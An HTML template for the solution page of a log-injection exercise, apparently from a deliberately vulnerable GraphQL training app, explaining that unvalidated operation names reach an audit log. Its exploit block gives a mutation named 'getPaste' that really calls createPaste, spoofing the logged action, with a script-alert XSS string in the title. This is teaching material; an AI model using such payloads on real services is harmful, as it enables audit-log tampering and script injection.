{% extends 'partials/solutions/solution_base.html' %}
<!-- Start -->
{% block title %}Injection :: Log Injection{% endblock %}

{% block body %}
  <p>
    GraphQL actions such as <code>mutation</code> and <code>query</code> have the ability to take an <code>operation name</code> as part of the query.
    Here is an example query that uses <code>MyName</code> as an operation name:
    <pre>query MyName {
      getMyName
      {
        first
        last
      }
    } </pre>
  </p>
  <p>The application is keeping track of all queries and mutations users are executing on this system in order to display them in the audit log.</p>
  <p>However, the application is not doing a fair job at verifying the operation name.</p>
{% endblock %}

{% block resources %}
  <li>
    <a href="https://cwe.mitre.org/data/definitions/117.html" target= "_blank">
      <i class="fa fa-newspaper"></i> CWE-117: Improper Output Neutralization for Logs
    </a>
  </li>
{% endblock %}

{% block exploits %}
  <pre class="bash">
    # Spoof the operation conducted to getPaste instead of createPaste
    mutation getPaste{
      createPaste(title:"&lt;script&gt;alert(1)&lt;/script&gt;", content:"zzzz", public:true) {
        pasteId
      }
    }
  </pre>
{% endblock %}
<!-- End -->
